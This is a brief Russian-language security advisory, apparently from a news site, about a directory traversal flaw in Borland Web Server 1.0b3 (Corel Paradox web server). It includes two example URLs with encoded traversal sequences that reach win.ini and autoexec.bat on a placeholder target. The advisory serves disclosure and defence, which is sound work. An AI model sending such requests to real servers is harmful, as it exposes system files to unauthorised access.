Программа: Borland Web Server 1.0b3 и более ранние версии 

Уязвимость обнаружена в Borland Web Server (Corel Paradox web server). Удаленный пользователь может просматривать файлы вне Web каталога.
Удаленный пользователь может представить специально обработанный URL, чтобы получить доступ к произвольным файлам на системе. 

Пример:

http://[target]/%5c%2e%2e%5c%2e%2e %5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
http://[target]/..................../autoexec.bat

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии